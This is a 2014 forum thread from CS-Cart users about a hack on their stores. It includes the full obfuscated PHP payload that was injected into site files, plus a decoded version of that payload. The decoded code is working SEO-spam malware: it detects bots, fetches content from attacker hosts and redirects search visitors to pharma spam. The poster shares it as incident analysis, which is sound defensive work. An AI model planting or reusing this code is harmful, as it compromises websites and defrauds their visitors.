Jump to content

  • You cannot start a new topic
  • You cannot reply to this topic

Wordpress hacker attack, CS-Cart can be affected Rate Topic   - - - - -

 
  • vmajor
  • Member
  • Members
  • Join Date: 08-Feb 10
  • 72 posts

Posted 03 June 2014 - 10:32 AM #1

Two of my sites were hacked today.

One is running 4.1.3 the other 4.1.5.

Development sites running on the same server were not hacked, and the hacks resulted in "500 Server Error" and were thus not functional.

I am therefore thinking that this is a front end attack, not shell access.

The files modified were all in Tygh directory. You can identify the exact files hacked by going through the apache2 error.log and seeing which file breaks the server (eg. Database.php). This is what is appended to the first line of the affected php files:

<?php eval(gzinflate(base64_decode('pRlrc9o69nN2Zv+DyrgxbhwwBkJo4qTdNL33zmxvuzTdmZ0kZYQtQIuxXdmQ0Dj/fc+R5EcIuXt3ttMiWeep85KOyqek+SpgUx6xoGlOxfJDalrWw1//sqcWizVid6wTWGVCxGIsWBKLjEezpiNX4e90FfkZjyMC+OMgJE1jJUKLIKc9DkIK+Jjd8zRLm6YP8DGPeAbyFNqe4c+JR0qAYnEiQXIxZVmcwLI/t8nFt9HfP3+5Go8ur76Nfr8avf/968fLkU06msCIV1nBjN0znyCZhqE+CiBEFEsAeeV5xLGIJpvSMGU1yX4Yp6zG4pEwQCAPGv3dlIdsPGPZ2I+jjEWwP6X7IyILlq1ERDLBl00kkCwed5jNF7g7Hkn77xk89NJMhCySaydG7JmmlD6NBejCQbBzQmA8hZ8QZwcHuIOWB/jXBr8l34n5RpFoHYz4JdmgvE/9OWsa2TIJuLCNkEcL2/CXGV8y28hi5kmraOWmIF2jtsx2ytJ0bLaWQb+ZCDbDAAmpD9HT/j7PsuTtTfumff39pn170DZtYsI/yd5S1jSmDG2ONtTRYUwVhE+brxCa5wTVaFrkUOJJpRCLnJEjh7whWk8LiXQwBaHvqWBsKmGF85vIcX+fSAxP74pI4N67LF7581L+HrpZThTTGjVbJtmmiTwsyQwMVDDRuM+YScPXmZaYkm0iIylO0OFT27zDRJzeCZ7hThO7FiIo1DohUxmWCNSRpnk/FN4GvAKgBvn7qGzuvxC4WlvNA75967wSDV9vVRjuiiKeTuKsqUNkRb13EMBZHMZ3TDSN8dfL0T8vR9fmr1dXX8bf4Gv8/pfL36/M29LZ6KnE44kbxlBcKorR5afPV5fj9x8+jADbOnUsRDzweu6wNzwauMOjE2l7Q6SwKyoE3TTVb/eoO+z3hsN+15bT/nGn51q2Anac46HTd48GXVtOj5zjowrYcYGi7zodW02HIKwEuoDvHrnO0JbTntsfOpatnaBF9wHU6/SAu5wOem73uOLe6Q6PHeBpq2nfcSvRbm84cPqwaMvpoNPvVJTAaOhKtmra7x8dbYvuHXc6A/gHonF67LrOUcHAHQK7gdsFk+DU7Q6OjysgKjLsDDqujdNuf+D2BjpPoe4wqBEQE2BmmhJDWAQjF1xx5hni2rmVmQCfp/jZubVIWftWrEroFbW21w2Im8p15iyOZyGDNdM2J3DOqFkarkQC4zKN1MK/GVuzFCYZi5cURl/Qu5AJxE14AJNtxaUYVH0iVYfwTGIs1tTGpVdlNXim39x7B2kyj9NssqFBIF4MTo0+od6TvSi14XdD53FslhFvwNlTqQdkUrv5U/XgvMOll9XT3+WxtSs3VbEuknNas3YbQKBZe02Fnrbad8mhLglteS5sL66SMKZBKpcLmgqRL+kMHIO7JPpPuUkt9OrTFzwKri71+OnLh99GpiW3v5Y3AlL7g0e2gUctOIFF6yagAA7s4vrWMzIscgVmbbrz3pFuUlnwMijgYzCIWTHaBjWtOmOFY7bM2qZ2bA8ti3uYWrUt7BmZPDCncFaqY1LQKGhadQM9PwSyKRjmTt3HSqy9etWvr68iPOWQ6ul6cRhM66tPDbYzgLbjJ2WCTYvwEajmruLekMV9dAmXsctRo0gHuB9sJ7fO7DIjbJOmC/yNw2dZi+RoUwz9WloIG5da4BJIjf8jM+Z0zRYMDvP0yRUnWqDS7B4iPYCrTI7KTXjIp5uchhMW/aQwBtTP4ojldBnf8zCnUUYnqxS+E5+GPM1pRgW9zycUvDZlEU7wIphPIEXgNiugoORAkFCR+wxKnmD3cnJPc59LDj4HrBzIlzzIA5ZuBAvzgE/DlU+jPIjvN/7GB9eznIV0DTqAn/xMkjLBQRyFcZPNRbzc+DzK4VqfMOCdT0M624T5DBjFyRwSNucR1Ewa5gsK+StoHtKU3+chW9MfK6CECc9wGbRDnZZsJsUs4wn34TcD46yWeQSphkMcrmkA24kFIGU0yxOKJoLQ5mkcMphI9YAx3BmXVMgJsJhtYIyVjmggH2wD4xrKDpCDQ3l0SHMRT4BdlENYxj9WYJKUh1JpGAOpFkyUvhAvNMuYmsVLsE4MahxCfPksTzcR2gZsm1FwJk/kiPQ4JvF9DgUnFksQlTFgVBgbnAdWus/XNMzQaaheDJB8zaUaaz6LYbhjYThZZbi5nzSiU7Bd/pNFDFF+cukVYII6M4DC/qR0OYNyXCz+jNccwkgnhrGAuMRo1eF6/mcysVUBRpf/+Hb59Wr8bfQbZOhbIz0purQisxZ2I4V75+vu+0Z56uR5Dcoj6G+egMvUq5oUnb2YR5i9kQW5K9sDCH24FzfazZtJPraMSI3tBoGEhqag4GRE9RR++dYpdx+toLv6mmFNuJgzfwHjJzrjvm4ujd+irOt+g7YSbFe7NkoY9FizDHvPot8CPmUN2m61FHLRbulmQ4okbzwttOozNeQMIKUGBVVB5pVohzUs6GqaPALkAtiusyhaimcsTskhXg57x92j3rFFzkvAwRMN3moznVR9QcHrwCOxCKQRHgz+qDveehdZUu44Jvz5nKZzSQ3lvbC+pOgQ75m7AMcmzn2n7/RxdHX/rghcbAt3U0gix+l+rON3yBkY2n2yApZpVlDSg24NSLsf4c+FQyySkxKsANafI79wdlL/OXIg3k1dkF8p0uZT+IVjkdNT5LJNeWEhxK3zdCXko/ORFDzdHTyVHZyXGQNIwpz797uYO3InSsCv4HjwkgxG2EBOQGTdHH/bZExmklz6COW6+kJacC7mIBwCUTZtmq9X+E6gmVrkhVTVhNvpWiAeks4Jwcw9kymMs8PDMm1HqE/BAoO9SlxwgIcbkWq+Jq5VZS1QQY7AcFIteCpZmzhvkw7Y84DIj9f48TzLpC3qXJSgg4Mq22qIrz3gUlZpR75WVeCnVUhbueNgNSlX/mBjpNxZHVwTXt/8lvrDpy8bNSBmYqe273oBMQdmq0JtFQ548V1sngj5oGYbWaAvZ/7cq1eb8qXQECz1th60ArshX6Ha7SyOwwkVcF8QnKUtdRNt+fGynU3EORzscIh7EV2r2SFdZfH+lFFQGriOaLTYB7kge/+Hx6Np/BblNuwj543bezOovWLAMalCVN1TWWqTBpKPG9bzAzNdTQBToQ31O+suMwgGRXlhPRR9dO3BBfvu2h3d0vEgvHcrzBIfL7Bb7y+/fv56ZdZuBWbtVlC0sXBx/wMO+mpRIgecNRunrz58vrj615dLMs+W4dmp+p3EwebsNPUFT7KzIPZXSzBvK4x9irvzmjeFgzqD49ag23I7bqvrtPHW2J7FrWSenC88Y7Gfeka6LzxD3DSsk9O2ZnjaVvzbUlijOrC0FSECuNBHSdEFI44B1vNqVpRrC6/eEqg1bPuBfvtp8+6h+3jTakNfAIXq5ZcuZWl1YmOP56+9d8b4C6xeYycoubdMf25at9YD3J3xhXutXvQQXSoP/i0KHqJbp3D24eKr2n0KNLoJHjo2KvXixMAHWMVDZxK0HliHdRQ+2SMx29ff6eHP8tm2tskJTdlRb6xDo7aRpAMdq2XZjt0tuj9sagsPTxIOvct8cteK4eLN7tikFa2Up6eMBdLXCfWkWvuQbMi0Ifm025Jblnj/UyiXLy3gZTQZZGdSRIOqLFli4UNyp0ibxH9WQbjsNZNWY5964X7iNVq1tAB6ACQQl8BZl4Paa3MCd1DMDZxU1V3vRqwEV6XiefTsyEgwy4zxQB43acogVMa/XF5dS2tBiJ3XP9903jplSSprEcizzfa5aUGZd6o7vV7HDvBe+kAhqLdtLfSMONpEtXJU5f7LNks8zUIbx8b2XF9hH/eKY00p4Xlm28QH//Kr1MlU2oAfq/8xeslT5JkbfEs64bkPELiQnNMg1IHxku/Thk1UJJ2TrgO36KL2E72nh0JeYVjgCamTw4GH+2nBTP1nU+2lYYc9/4tBQZHtIETuVnEU1Q1cHb9FRVlY5KnAx/8A')));?>

I am running PHP 5.5 and Apache 2.4 and presently have mod_security disabled. That is getting corrected as I speak.

 
  • vmajor
  • Member
  • Members
  • Join Date: 08-Feb 10
  • 72 posts

Posted 03 June 2014 - 11:28 AM #2

Sites just got hacked again...while I was installing modsecurity 2.8. Modsecurity is now up and running. Let's see if that helps.

 
  • vmajor
  • Member
  • Members
  • Join Date: 08-Feb 10
  • 72 posts

Posted 03 June 2014 - 12:27 PM #3

I have decoded the payload. This is what the hacker(s) attempted to inject. It is a bit late here so I cannot focus too well, but it seems to be some kind of link spam/traffic scam link. It also seems to target WordPress, it is not CS Cart specific, so also check your Wordpress sites.

if (!defined('frmDs')){
define('frmDs' ,1);
error_reporting(0);

function frm_dl ($url) {
  if (function_exists('curl_init')) {
   $ch = curl_init($url);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   $out = curl_exec ($ch);
   if (curl_errno($ch) !== 0) $out = false;
   curl_close ($ch);
  } else {$out = @file_get_contents($url);}
  return trim($out);
}

function frm_crpt($in){
  $il=strlen($in);$o='';
  for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
  return $o;
}

function frm_getcache($tmpdir,$link,$cmtime,$toe=false){
  $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));
  $fe = file_exists($f);
  if(!$fe || time() - filemtime($f) > 60 * $cmtime)
  {
   $dlc=frm_dl($link);
   if($fe && $dlc===false)
	@touch($f);
   else
   {
	if($fe && empty($dlc) && $toe)
	{
	 @touch($f);
	}
	else
	{
	 if($fp = @fopen($f,'w')){fwrite($fp, frm_crpt($dlc)); fclose($fp);}
	 else{return $dlc;}
	}
   }
  }
  $fc = @file_get_contents($f);
  return ($fc)?frm_crpt($fc):'';
}

function frm_isbot(){
  $ua=@strtolower($_SERVER['HTTP_USER_AGENT']);
  if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296;
  $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),
	 array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),
	 array(3481178113,3481182206),array(2915172353,2915237886),array(2850291712,2850357247));
  foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
  if(!$ua)return true;
  $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');
  foreach ($bots as $<img src='http://forum.cs-cart.com/public/style_emoticons/<#EMO_DIR#>/cool.png' class='bbc_emoticon' alt='B)' /> if(strpos($ua, $<img src='http://forum.cs-cart.com/public/style_emoticons/<#EMO_DIR#>/cool.png' class='bbc_emoticon' alt='B)' />!==false) return true;
  $h=@gethostbyaddr($_SERVER['REMOTE_ADDR']);
  $hba=array('google','msn','yahoo');
  if($h) foreach ($hba as $hb) if(strpos($h, $hb)!==false) return true;
  return false;
}

function frm_tmpdir(){
  $fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');
		foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {
			if ($t = getenv($v)) {$fs[]=$t;}
		}
		if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}
		$fs[]='.';
	  
		foreach ($fs as $f){
		 $tf = $f.'/'.md5(rand());
		 if($fp = @fopen($tf, 'w')){
		  fclose($fp);
		  unlink($tf);
		  return $f;
		 }
		}
  return false;
}
function frm_seref(){
  $r = @strtolower($_SERVER["HTTP_REFERER"]);
  $ses = array('google','bing','yahoo','ask','aol');
  foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;
  return false;
}

function frm_havekey($s=false){
  $nks = explode('|','abilify|albenza|aldactone|amoxil|antabuse|apcalis|atarax|baclofen|bactrim|bimatoprost|buspar|celebrex|celexa|cialis|cipro|clomid|desyrel|diflucan|doxycycline|elavil|erectalis|eriacta|erythromycin|finpecia|flagyl|glucophage|inderal|kamagra|lasix|levaquin|levitra|lexapro|megalis|mobic|motilium|nexium|nolvadex|orlistat|paxil|penisole|periactin|premarin|priligy|propecia|proscar|proventil|retin-a|robaxin|seroquel|silagra|sildalis|silvitra|strattera|stromectol|p-force|synthroid|tadacip|tadalis|tadapox|tenormin|tetracycline|topamax|valtrex|ventolin|viagra|vigora|wellbutrin|zanaflex|zenegra|zithromax|sildenafil|tadalafil|vardenafil|zovirax');
  $k = ($s==false)?@strtolower($_SERVER["HTTP_REFERER"].$_SERVER["REQUEST_URI"]):$s;
  if (strpos($k,"site%3A")!==false||strpos($k,"inurl%3A")!==false) return '';
  foreach ($nks as $n)if(preg_match("/(\b|_)$n(\b|_)/" , $k)) return $n;
  return '';
}

function frm_strtonum($Str, $Check, $Magic) {
  $Int32Unit = 4294967296;
  $length = strlen($Str);
  for ($i = 0; $i < $length; $i++) {
   $Check *= $Magic;
   if ($Check >= $Int32Unit) {
	$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
	$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
   }
   $Check += ord($Str{$i});
  }
  return $Check;
}
function frm_chhash($String) {
  $Check1 =frm_strtonum($String, 0x1505, 0x21);
  $Check2 = frm_strtonum($String, 0, 0x1003F);
  $Check1 >>= 2;
  $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
  $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
  $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
  $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
  $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
  $Hashnum = ($T1 | $T2);
  $CheckByte = 0;
  $Flag = 0;
  $HashStr = sprintf('%u', $Hashnum) ;
  $length = strlen($HashStr);
  for ($i = $length - 1;  $i >= 0;  $i --) {
   $Re = $HashStr{$i};
   if (1 === ($Flag % 2)) {
	$Re += $Re;
	$Re = (int)($Re / 10) + ($Re % 10);
   }
   $CheckByte += $Re;
   $Flag ++;
  }
  $CheckByte %= 10;
  if (0 !== $CheckByte) {
   $CheckByte = 10 - $CheckByte;
   if (1 === ($Flag % 2) ) {
	if (1 === ($CheckByte % 2)) {
	 $CheckByte += 9;
	}
	$CheckByte >>= 1;
   }
  }
  return '7'.$CheckByte.$HashStr;
}

function frm_chpr($url,$td){
  $ch=frm_chhash($url);
  $res=frm_getcache($td,"http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=$ch&q=info:$url",60*24*7);
  if(($pos = strpos($res, "Rank_"))!==false) return substr($res,9,1);
}

function frm_red($k){
  if(!frm_isbot() && frm_seref()){
   $r=@urlencode($_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
   $s=@urlencode($_SERVER['HTTP_REFERER']);
   die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
  }
}

$tdir = frm_tmpdir();
$isb=frm_isbot();
$k=frm_havekey();
$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
  $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
  $sp = "http://bpiiflhbw.ontheweb.nu/stat/feed.php?pa=$parg&h=$host";
  //
  $tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
  if($isb && ($ppr = frm_chpr($tp)) > 1){
   $pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
   if($pc) die($pc);
  }
  //
  $ruri = strtolower($_SERVER['REQUEST_URI']);
  $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
  if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){
   frm_red($k);
   die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
  }
  if (($ruri=='/' || $ruri=='/index.php') && $isb) {
   $c=frm_getcache($tdir, $sp ,60*24);
   if($c)die($c);
  }
  //
  if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60*24*7) ,true)){
   if(strpos($sdl, '|'.$ruri.'|') !== false){
	frm_red($k);
	die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60*24*7,true));
   }
  }
}
if($k) frm_red($k);
}


 
  • snorocket
  • Forum Janitor
  • Members
  • Join Date: 15-Mar 06
  • 2519 posts

Posted 03 June 2014 - 12:34 PM #4

I have decoded the payload. This is what the hacker(s) attempted to inject:

$fs = array('/tmp','/var/tmp','./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images');

Bad news here, are they hacking a Wordpress install?
SNOROCKET.COM, Now Accepting PRE-ORDERS:
Customer Service (Helpdesk) Addon for CS-Cart v4.3.1
Quote and Invoicing Addon for CS-Cart v4.3.1

 
  • vmajor
  • Member
  • Members
  • Join Date: 08-Feb 10
  • 72 posts

Posted 03 June 2014 - 12:40 PM #5

yea :-) It seems that it is either not CS Cart specific or that it actually expects Wordpress but it's injection method seems to be CMS agnostic. Thus it may be targeting a platform vulnerability. I find this a bit disturbing since we are on the latest updates branch for Apache 2.4 and PHP 5.5.

 
  • imac
  • Head of Product
  • CS-Cart Architects
  • Join Date: 22-Nov 05
  • 2074 posts

Posted 03 June 2014 - 01:21 PM #6

Guys, I nearly fainted when I saw the thread title(
I hope you do not mind if I rename it.
Ilya Makarov,
CS-Cart Architect Team
Suggest and vote for new features | Report a bug

 
  • vmajor
  • Member
  • Members
  • Join Date: 08-Feb 10
  • 72 posts

Posted 03 June 2014 - 01:37 PM #7

Well, CS Cart was affected. It is not a "can be". Both 4.1.3 and 4.1.5 were taken down, twice. It does appear that the target is Wordpress and that when the CS Cart php files are hacked the result is "500 Server Error" rather than the intended bounty of spam.

Nevertheless this is rather serious as I only managed to recover the sites because I had local backups.

 
  • tbirnseth
  • CS Cart Expert
  • Authorized Reseller
  • Join Date: 08-Nov 08
  • 11362 posts

Posted 03 June 2014 - 07:40 PM #8

Guys, just because cs-cart was affected DOES NOT MEAN that cs-cart itself is vulnerable.

If the entry point is outside of cs-cart, then file ownership/permissions are to blame or the "site account" has been compromised.

What are the ownerships and permissions of the affected files and the parent directory?

Please be cautious of claims. Everyone is very sensitized to security right now (good thing) and you must be sure of claims before they are made.

And again, if you were monitoring files on a daily (or more frequent) basis, then you would be aware that a file like Database.php had been modified.

EZ Merchant Solutions: Custom (USA based) B2B Development, Consulting, Development and Special Projects (get a quote here).
Commercial addons, payment methods and modifications to meet your business and operations needs.


 
  • vmajor
  • Member
  • Members
  • Join Date: 08-Feb 10
  • 72 posts

Posted 03 June 2014 - 10:54 PM #9

True, I do not know the entry point for this particular hack. The shell/user was not compromised, of that I am fairly certain as I went through a pretty thorough process verifying this. Besides the system is...um, trapped. Brute force will not work.

I also investigated the hack more thoroughly, but I have not finished yet. The hack is a variant of this: http://codinginpubli...jection-script/

I will need to find out how they got the hack in. As mentioned the system is entirely up to date and the WP blog is set to auto update (v 3.9.1 now).

I am not claiming anything. I am reporting.

Thank you for underlining the monitoring of files thing....if you read my opening post you'd have noticed that the sites were taken offline by the hack thus it was rather hard not to notice the file modification.

V.